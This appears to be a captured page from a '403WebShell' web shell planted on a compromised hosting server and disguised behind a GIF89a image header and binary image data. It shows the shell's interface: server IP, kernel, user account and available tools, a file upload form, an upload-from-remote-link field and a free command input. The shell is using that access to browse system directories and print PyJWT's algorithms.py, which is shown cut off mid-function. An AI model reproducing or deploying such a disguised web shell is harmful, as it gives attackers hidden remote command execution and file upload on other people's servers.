GIF89a=
( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ                                                                           !ù

 ' !ÿ
NETSCAPE2.0
   ,    =
(  þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE
¯°
¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ
|¥ÂÙ­&ºìE8œ¹kGÔAÞpx­a¶­ãR2XB®åE
8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ Â
4#ZÔ‰O|-4Bs‘X:=
QÉ œš lºÒyXJŠGȦ|s
hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ
¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5
½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ
 l5‘Ž¯pß´
˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½	‘Ý{ó)vmÞü%D~6f s}ŃƒDØW Eþ`‡þ	À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`}	lď’ÄÉ@4>ñd
œ à‘vÒxNÃ×™@žd=ˆgsžG±æ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH]
†¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ	».Û¬¯
t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°
Ÿð0Ä_ 
½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p%
AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À×
 ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ö×Þ^`8EÜ]
ý.뜃Âç 7 ú ȉÞj œ½Dç 
zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼	&A
¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂ
xŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`AÚ/NE€Ø†À9‚@¤à	H½7”à‡%B‰`À
l*ƒó‘–
‡8 2ñ%¸ —€:Ù1Á‰E¸àux%
nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û
°b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@%òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐQTÂ
o‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3	ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚  !ù

 " ,    =
( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ                                                                                          þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g
 «¬ E 
±±
¨­¶°ººE
Á´”·®C¬²
§Ç¶
Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ	l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ»
K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M	'¡¨2¸*Ÿþ>#nâ†
å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤
×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N
E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦
‚ ŽkÛTÇDpE@WÜ	²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰
 h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8  #VÇá <Fù–C™Ä^F9Ä #­ÉRAGb©d“(0$kêè‘ž¨'L¢)B]æù¨eŠ>‘å–ÄV„œ|Šè•m"сœn|@
›U¶ÆΞ—Špb¥G¨ED”€±Úê2FÌIç?
>Éxå
α
¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë
QÀÉSÌÂÇ2ÌXÀ{æk²
lQÁ2«ÊðÀ¯w|2Íh‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ	q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ
üôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶	0QwG#¯
æš[^Äþ	$ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ì<O»í!‹œ{÷E ÿ{ðVðÚú×Cß{òËgo„óõú’'߁zEHÔrJÅ=˜5€Ýé²¥ºá¹î4Â÷ˆÐ´V	w ƒß$xVA.¬+üä'ÊE„E ^ž‡©£•84`K—>L¹„®£œŠ‚à0œ]PÁ^p	F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-
žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q	q”
‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/
&.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ	¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—!	¦t)K%tœ-¦JF
bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ	‰   !ù

 ) ,    =
( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ                                                                     þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª«

E$±²¨ª­
·
°²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ EééH½MÛÂGâªD­çBêêϾD²ÒaÀà€Š1r­ðÓ¤	ÔožzU!L˜C'¾yW½UGtäÇïÙllê
0×àÂuGþ)AÀs[þ·xì
ÁxO%ƒûX2ó—

P£n›R/¡ÑšHše+êDm?#—‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°-
<‡
*´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü
wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á
 ~Öº“®›¸ÏMDfJÙ
°„
ÛµáWõ%§œ‚à©–‚X Ó؁)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d€CÁW)HÜcC$€L 
Ä7„r.á\{)@ð` @	äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦
P
…d’ä¡“¦ðÎTƒ¦ià|À
 _

¥ Qi#¦Šg›Æ ›noMµ
›V
ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, 
\jÛ´›6±¬¶C
ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥
²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëêÂ
7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*
3)O‘˜Ö[_hv
,àî×EtŸé¶BH€Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g›
êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºí
ï{ËC Ú—"”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»]	A#ð «€¿šéz)
Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa
¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oŠ°^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ®
©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF
Í[¤+‹ðɈ-áwj¨¥þ8¾rá
,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK“¦Ç#
âDÂ:ûc?:R	Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW	,
ˆ”8(T™P‰F¡Jhç"‚  ;<html>
<!doctypehtml><html><head><title>403WebShell</title><meta content="noindex"name="robots"></head><body bgcolor="#1f1f1f"text="#ffffff"><link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"rel="stylesheet"><style>@import url(https://fonts.googleapis.com/css?family=Dosis);@import url(https://fonts.googleapis.com/css?family=Bungee);@import url(https://fonts.googleapis.com/css?family=Russo+One);body{font-family:Consolas,cursive;text-shadow:0 0 1px #757575}body::-webkit-scrollbar{width:12px}body::-webkit-scrollbar-track{background:#1f1f1f}body::-webkit-scrollbar-thumb{background-color:#1f1f1f;border:3px solid gray}#content tr:hover{background-color:#636263;text-shadow:0 0 10px #fff}#content .first{background-color:#5e5e5e}#content .first:hover{background-color:#25383c;text-shadow:0 0 1px #757575}table{border:1px #000 dotted;table-layout:fixed}td{word-wrap:break-word}a{color:#df5;text-decoration:none}a:hover{color:#000;text-shadow:0 0 10px #fff}input,select,textarea{border:1px #000 solid;-moz-border-radius:5px;-webkit-border-radius:5px;border-radius:5px}.gas{background-color:#1f1f1f;color:#fff;cursor:pointer}select{background-color:transparent;color:#fff}select:after{cursor:pointer}.linka{background-color:transparent;color:#fff}.up{background-color:transparent;color:#fff}option{background-color:#1f1f1f}.btf{background:0 0;border:1px #fff solid;cursor:pointer}::-webkit-file-upload-button{background:0 0;color:#fff;border-color:#fff;cursor:pointer}</style><center><font face="Bungee" size="5">403Webshell</font></center>
<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Server IP : <font color=#df5>104.21.83.152</font> &nbsp;/&nbsp; Your IP : <font color=#df5>216.73.216.195</font><br>Web Server : <font color='#df5'>LiteSpeed</font><br>System : <font color='#df5'>Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64</font><br>User : <font color='#df5'>akhalid&nbsp;</font>( <font color='#df5'>749</font>)<br>PHP Version : <font color='#df5'>8.3.22</font><br>Disable Function : <font color='#df5'>NONE</font></font><br>MySQL : <font color=red>OFF</font> &nbsp;|&nbsp; cURL : <font color=green>ON</font> &nbsp;|&nbsp; WGET : <font color=green>ON</font> &nbsp;|&nbsp; Perl : <font color=green>ON</font> &nbsp;|&nbsp; Python : <font color=green>ON</font> &nbsp;|&nbsp; Sudo : <font color=red>OFF</font> &nbsp;|&nbsp; Pkexec : <font color=red>OFF</font><br>Directory : &nbsp;<a href="?loknya=/">/</a><a href="?loknya=/opt">opt</a>/<a href="?loknya=/opt/cloudlinux">cloudlinux</a>/<a href="?loknya=/opt/cloudlinux/venv">venv</a>/<a href="?loknya=/opt/cloudlinux/venv/lib64">lib64</a>/<a href="?loknya=/opt/cloudlinux/venv/lib64/python3.11">python3.11</a>/<a href="?loknya=/opt/cloudlinux/venv/lib64/python3.11/site-packages">site-packages</a>/<a href="?loknya=/opt/cloudlinux/venv/lib64/python3.11/site-packages/jwt">jwt</a>/</td></tr><tr><td><br>Upload File : <form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ <font color='red'>Writeable</font> ]
<input type="radio" value="2" name="dirnya" >document_root [ <font color='green'>Writeable</font> ]
<br>
<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>
<input type="text" name="darilink" class="up" placeholder="https://linuxploit.com/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="5" placeholder="kerang.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
</form><br><form method="post" enctype="application/x-www-form-urlencoded">
Command : <input type="text" name="komend" class="up" style="cursor: pointer; border-color: #000" value="">
<input type="submit" name="komends" value=">>" class="up" style="cursor: pointer; border-color: #fff">
</form></table><br><hr><center style="font-family: Russo One">[ <a href='/228ef4/index.php'>Back</a> ]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<hr></center><br><tr><td>Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/jwt//algorithms.py</tr></td></table><br/><pre>from __future__ import annotations

import hashlib
import hmac
import json
import sys
from abc import ABC, abstractmethod
from typing import TYPE_CHECKING, Any, ClassVar, NoReturn, Union, cast, overload

from .exceptions import InvalidKeyError
from .types import HashlibHash, JWKDict
from .utils import (
    base64url_decode,
    base64url_encode,
    der_to_raw_signature,
    force_bytes,
    from_base64url_uint,
    is_pem_format,
    is_ssh_key,
    raw_to_der_signature,
    to_base64url_uint,
)

if sys.version_info &gt;= (3, 8):
    from typing import Literal
else:
    from typing_extensions import Literal


try:
    from cryptography.exceptions import InvalidSignature
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import padding
    from cryptography.hazmat.primitives.asymmetric.ec import (
        ECDSA,
        SECP256K1,
        SECP256R1,
        SECP384R1,
        SECP521R1,
        EllipticCurve,
        EllipticCurvePrivateKey,
        EllipticCurvePrivateNumbers,
        EllipticCurvePublicKey,
        EllipticCurvePublicNumbers,
    )
    from cryptography.hazmat.primitives.asymmetric.ed448 import (
        Ed448PrivateKey,
        Ed448PublicKey,
    )
    from cryptography.hazmat.primitives.asymmetric.ed25519 import (
        Ed25519PrivateKey,
        Ed25519PublicKey,
    )
    from cryptography.hazmat.primitives.asymmetric.rsa import (
        RSAPrivateKey,
        RSAPrivateNumbers,
        RSAPublicKey,
        RSAPublicNumbers,
        rsa_crt_dmp1,
        rsa_crt_dmq1,
        rsa_crt_iqmp,
        rsa_recover_prime_factors,
    )
    from cryptography.hazmat.primitives.serialization import (
        Encoding,
        NoEncryption,
        PrivateFormat,
        PublicFormat,
        load_pem_private_key,
        load_pem_public_key,
        load_ssh_public_key,
    )

    has_crypto = True
except ModuleNotFoundError:
    has_crypto = False


if TYPE_CHECKING:
    # Type aliases for convenience in algorithms method signatures
    AllowedRSAKeys = RSAPrivateKey | RSAPublicKey
    AllowedECKeys = EllipticCurvePrivateKey | EllipticCurvePublicKey
    AllowedOKPKeys = (
        Ed25519PrivateKey | Ed25519PublicKey | Ed448PrivateKey | Ed448PublicKey
    )
    AllowedKeys = AllowedRSAKeys | AllowedECKeys | AllowedOKPKeys
    AllowedPrivateKeys = (
        RSAPrivateKey | EllipticCurvePrivateKey | Ed25519PrivateKey | Ed448PrivateKey
    )
    AllowedPublicKeys = (
        RSAPublicKey | EllipticCurvePublicKey | Ed25519PublicKey | Ed448PublicKey
    )


requires_cryptography = {
    &quot;RS256&quot;,
    &quot;RS384&quot;,
    &quot;RS512&quot;,
    &quot;ES256&quot;,
    &quot;ES256K&quot;,
    &quot;ES384&quot;,
    &quot;ES521&quot;,
    &quot;ES512&quot;,
    &quot;PS256&quot;,
    &quot;PS384&quot;,
    &quot;PS512&quot;,
    &quot;EdDSA&quot;,
}


def get_default_algorithms() -&gt; dict[str, Algorithm]:
    &quot;&quot;&quot;
    Returns the algorithms that are implemented by the library.
    &quot;&quot;&quot;
    default_algorithms = {
        &quot;none&quot;: NoneAlgorithm(),
        &quot;HS256&quot;: HMACAlgorithm(HMACAlgorithm.SHA256),
        &quot;HS384&quot;: HMACAlgorithm(HMACAlgorithm.SHA384),
        &quot;HS512&quot;: HMACAlgorithm(HMACAlgorithm.SHA512),
    }

    if has_crypto:
        default_algorithms.update(
            {
                &quot;RS256&quot;: RSAAlgorithm(RSAAlgorithm.SHA256),
                &quot;RS384&quot;: RSAAlgorithm(RSAAlgorithm.SHA384),
                &quot;RS512&quot;: RSAAlgorithm(RSAAlgorithm.SHA512),
                &quot;ES256&quot;: ECAlgorithm(ECAlgorithm.SHA256),
                &quot;ES256K&quot;: ECAlgorithm(ECAlgorithm.SHA256),
                &quot;ES384&quot;: ECAlgorithm(ECAlgorithm.SHA384),
                &quot;ES521&quot;: ECAlgorithm(ECAlgorithm.SHA512),
                &quot;ES512&quot;: ECAlgorithm(
                    ECAlgorithm.SHA512
                ),  # Backward compat for #219 fix
                &quot;PS256&quot;: RSAPSSAlgorithm(RSAPSSAlgorithm.SHA256),
                &quot;PS384&quot;: RSAPSSAlgorithm(RSAPSSAlgorithm.SHA384),
                &quot;PS512&quot;: RSAPSSAlgorithm(RSAPSSAlgorithm.SHA512),
                &quot;EdDSA&quot;: OKPAlgorithm(),
            }
        )

    return default_algorithms


class Algorithm(ABC):
    &quot;&quot;&quot;
    The interface for an algorithm used to sign and verify tokens.
    &quot;&quot;&quot;

    def compute_hash_digest(self, bytestr: bytes) -&gt; bytes:
        &quot;&quot;&quot;
        Compute a hash digest using the specified algorithm&#039;s hash algorithm.

        If there is no hash algorithm, raises a NotImplementedError.
        &quot;&quot;&quot;
        # lookup self.hash_alg if defined in a way that mypy can understand
        hash_alg = getattr(self, &quot;hash_alg&quot;, None)
        if hash_alg is None:
            raise NotImplementedError

        if (
            has_crypto
            and isinstance(hash_alg, type)
            and issubclass(hash_alg, hashes.HashAlgorithm)
        ):
            digest = hashes.Hash(hash_alg(), backend=default_backend())
            digest.update(bytestr)
            return bytes(digest.finalize())
        else:
            return bytes(hash_alg(bytestr).digest())

    @abstractmethod
    def prepare_key(self, key: Any) -&gt; Any:
        &quot;&quot;&quot;
        Performs necessary validation and conversions on the key and returns
        the key value in the proper format for sign() and verify().
        &quot;&quot;&quot;

    @abstractmethod
    def sign(self, msg: bytes, key: Any) -&gt; bytes:
        &quot;&quot;&quot;
        Returns a digital signature for the specified message
        using the specified key value.
        &quot;&quot;&quot;

    @abstractmethod
    def verify(self, msg: bytes, key: Any, sig: bytes) -&gt; bool:
        &quot;&quot;&quot;
        Verifies that the specified digital signature is valid
        for the specified message and key values.
        &quot;&quot;&quot;

    @overload
    @staticmethod
    @abstractmethod
    def to_jwk(key_obj, as_dict: Literal[True]) -&gt; JWKDict:
        ...  # pragma: no cover

    @overload
    @staticmethod
    @abstractmethod
    def to_jwk(key_obj, as_dict: Literal[False] = False) -&gt; str:
        ...  # pragma: no cover

    @staticmethod
    @abstractmethod
    def to_jwk(key_obj, as_dict: bool = False) -&gt; Union[JWKDict, str]:
        &quot;&quot;&quot;
        Serializes a given key into a JWK
        &quot;&quot;&quot;

    @staticmethod
    @abstractmethod
    def from_jwk(jwk: str | JWKDict) -&gt; Any:
        &quot;&quot;&quot;
        Deserializes a given key from JWK back into a key object
        &quot;&quot;&quot;


class NoneAlgorithm(Algorithm):
    &quot;&quot;&quot;
    Placeholder for use when no signing or verification
    operations are required.
    &quot;&quot;&quot;

    def prepare_key(self, key: str | None) -&gt; None:
        if key == &quot;&quot;:
            key = None

        if key is not None:
            raise InvalidKeyError(&#039;When alg = &quot;none&quot;, key value must be None.&#039;)

        return key

    def sign(self, msg: bytes, key: None) -&gt; bytes:
        return b&quot;&quot;

    def verify(self, msg: bytes, key: None, sig: bytes) -&gt; bool:
        return False

    @staticmethod
    def to_jwk(key_obj: Any, as_dict: bool = False) -&gt; NoReturn:
        raise NotImplementedError()

    @staticmethod
    def from_jwk(jwk: str | JWKDict) -&gt; NoReturn:
        raise NotImplementedError()


class HMACAlgorithm(Algorithm):
    &quot;&quot;&quot;
    Performs signing and verification operations using HMAC
    and the specified hash function.
    &quot;&quot;&quot;

    SHA256: ClassVar[HashlibHash] = hashlib.sha256
    SHA384: ClassVar[HashlibHash] = hashlib.sha384
    SHA512: ClassVar[HashlibHash] = hashlib.sha512

    def __init__(self, hash_alg: HashlibHash) -&gt; None:
        self.hash_alg = hash_alg

    def prepare_key(self, key: str | bytes) -&gt; bytes:
        key_bytes = force_bytes(key)

        if is_pem_format(key_bytes) or is_ssh_key(key_bytes):
            raise InvalidKeyError(
                &quot;The specified key is an asymmetric key or x509 certificate and&quot;
                &quot; should not be used as an HMAC secret.&quot;
            )

        return key_bytes

    @overload
    @staticmethod
    def to_jwk(key_obj: str | bytes, as_dict: Literal[True]) -&gt; JWKDict:
        ...  # pragma: no cover

    @overload
    @staticmethod
    def to_jwk(key_obj: str | bytes, as_dict: Literal[False] = False) -&gt; str:
        ...  # pragma: no cover

    @staticmethod
    def to_jwk(key_obj: str | bytes, as_dict: bool = False) -&gt; Union[JWKDict, str]:
        jwk = {
            &quot;k&quot;: base64url_encode(force_bytes(key_obj)).decode(),
            &quot;kty&quot;: &quot;oct&quot;,
        }

        if as_dict:
            return jwk
        else:
            return json.dumps(jwk)

    @staticmethod
    def from_jwk(jwk: str | JWKDict) -&gt; bytes:
        try:
            if isinstance(jwk, str):
                obj: JWKDict = json.loads(jwk)
            elif isinstance(jwk, dict):
                obj = jwk
            else:
                raise ValueError
        except ValueError:
            raise InvalidKeyError(&quot;Key is not valid JSON&quot;)

        if obj.get(&quot;kty&quot;) != &quot;oct&quot;:
            raise InvalidKeyError(&quot;Not an HMAC key&quot;)

        return base64url_decode(obj[&quot;k&quot;])

    def sign(self, msg: bytes, key: bytes) -&gt; bytes:
        return hmac.new(key, msg, self.hash_alg).digest()

    def verify(self, msg: bytes, key: bytes, sig: bytes) -&gt; bool:
        return hmac.compare_digest(sig, self.sign(msg, key))


if has_crypto:

    class RSAAlgorithm(Algorithm):
        &quot;&quot;&quot;
        Performs signing and verification operations using
        RSASSA-PKCS-v1_5 and the specified hash function.
        &quot;&quot;&quot;

        SHA256: ClassVar[type[hashes.HashAlgorithm]] = hashes.SHA256
        SHA384: ClassVar[type[hashes.HashAlgorithm]] = hashes.SHA384
        SHA512: ClassVar[type[hashes.HashAlgorithm]] = hashes.SHA512

        def __init__(self, hash_alg: type[hashes.HashAlgorithm]) -&gt; None:
            self.hash_alg = hash_alg

        def prepare_key(self, key: AllowedRSAKeys | str | bytes) -&gt; AllowedRSAKeys:
            if isinstance(key, (RSAPrivateKey, RSAPublicKey)):
                return key

            if not isinstance(key, (bytes, str)):
                raise TypeError(&quot;Expecting a PEM-formatted key.&quot;)

            key_bytes = force_bytes(key)

            try:
                if key_bytes.startswith(b&quot;ssh-rsa&quot;):
                    return cast(RSAPublicKey, load_ssh_public_key(key_bytes))
                else:
                    return cast(
                        RSAPrivateKey, load_pem_private_key(key_bytes, password=None)
                    )
            except ValueError:
                return cast(RSAPublicKey, load_pem_public_key(key_bytes))

        @overload
        @staticmethod
        def to_jwk(key_obj: AllowedRSAKeys, as_dict: Literal[True]) -&gt; JWKDict:
            ...  # pragma: no cover

        @overload
        @staticmethod
        def to_jwk(key_obj: AllowedRSAKeys, as_dict: Literal[False] = False) -&gt; str:
            ...  # pragma: no cover

        @staticmethod
        def to_jwk(
            key_obj: AllowedRSAKeys, as_dict: bool = False
        ) -&gt; Union[JWKDict, str]:
            obj: dict[str, Any] | None = None

            if hasattr(key_obj, &quot;private_numbers&quot;):
                # Private key
                numbers = key_obj.private_numbers()

                obj = {
                    &quot;kty&quot;: &quot;RSA&quot;,
                    &quot;key_ops&quot;: [&quot;sign&quot;],
                    &quot;n&quot;: to_base64url_uint(numbers.public_numbers.n).decode(),
                    &quot;e&quot;: to_base64url_uint(numbers.public_numbers.e).decode(),
                    &quot;d&quot;: to_base64url_uint(numbers.d).decode(),
                    &quot;p&quot;: to_base64url_uint(numbers.p).decode(),
                    &quot;q&quot;: to_base64url_uint(numbers.q).decode(),
                    &quot;dp&quot;: to_base64url_uint(numbers.dmp1).decode(),
                    &quot;dq&quot;: to_base64url_uint(numbers.dmq1).decode(),
                    &quot;qi&quot;: to_base64url_uint(numbers.iqmp).decode(),
                }

            elif hasattr(key_obj, &quot;verify&quot;):
                # Public key
                numbers = key_obj.public_numbers()

                obj = {
                    &quot;kty&quot;: &quot;RSA&quot;,
                    &quot;key_ops&quot;: [&quot;verify&quot;],
                    &quot;n&quot;: to_base64url_uint(numbers.n).decode(),
                    &quot;e&quot;: to_base64url_uint(numbers.e).decode(),
                }
            else:
                raise InvalidKeyError(&quot;Not a public or private key&quot;)

            if as_dict:
                return obj
            else:
                return json.dumps(obj)

        @staticmethod
        def from_jwk(jwk: str | JWKDict) -&gt; AllowedRSAKeys:
            try:
                if isinstance(jwk, str):
                    obj = json.loads(jwk)
                elif isinstance(jwk, dict):
                    obj = jwk
                else:
                    raise ValueError
            except ValueError:
                raise InvalidKeyError(&quot;Key is not valid JSON&quot;)

            if obj.get(&quot;kty&quot;) != &quot;RSA&quot;:
                raise InvalidKeyError(&quot;Not an RSA key&quot;)

            if &quot;d&quot; in obj and &quot;e&quot; in obj and &quot;n&quot; in obj:
                # Private key
                if &quot;oth&quot; in obj:
                    raise InvalidKeyError(
                        &quot;Unsupported RSA private key: &gt; 2 primes not supported&quot;
                    )

                other_props = [&quot;p&quot;, &quot;q&quot;, &quot;dp&quot;, &quot;dq&quot;, &quot;qi&quot;]
                props_found = [prop in obj for prop in other_props]
                any_props_found = any(props_found)

                if any_props_found and not all(props_found):
                    raise InvalidKeyError(
                        &quot;RSA key must include all parameters if any are present besides d&quot;
                    )

                public_numbers = RSAPublicNumbers(
                    from_base64url_uint(obj[&quot;e&quot;]),
                    from_base64url_uint(obj[&quot;n&quot;]),
                )

                if any_props_found:
                    numbers = RSAPrivateNumbers(
                        d=from_base64url_uint(obj[&quot;d&quot;]),
                        p=from_base64url_uint(obj[&quot;p&quot;]),
                        q=from_base64url_uint(obj[&quot;q&quot;]),
                        dmp1=from_base64url_uint(obj[&quot;dp&quot;]),
                        dmq1=from_base64url_uint(obj[&quot;dq&quot;]),
                        iqmp=from_base64url_uint(obj[&quot;qi&quot;]),
                        public_numbers=public_numbers,
                    )
                else:
                    d = from_base64url_uint(obj[&quot;d&quot;])
                    p, q = rsa_recover_prime_factors(
                        public_numbers.n, d, public_numbers.e
                    )

                    numbers = RSAPrivateNumbers(
                        d=d,
                        p=p,
                        q=q,
                        dmp1=rsa_crt_dmp1(d, p),
                        dmq1=rsa_crt_dmq1(d, q),
                        iqmp=rsa_crt_iqmp(p, q),
                        public_numbers=public_numbers,
                    )

                return numbers.private_key()
            elif &quot;n&quot; in obj and &quot;e&quot; in obj:
                # Public key
                return RSAPublicNumbers(
                    from_base64url_uint(obj[&quot;e&quot;]),
                    from_base64url_uint(obj[&quot;n&quot;]),
                ).public_key()
            else:
                raise InvalidKeyError(&quot;Not a public or private key&quot;)

        def sign(self, msg: bytes, key: RSAPrivateKey) -&gt; bytes:
            return key.sign(msg, padding.PKCS1v15(), self.hash_alg())

        def verify(self, msg: bytes, key: RSAPublicKey, sig: bytes) -&gt; bool:
            try:
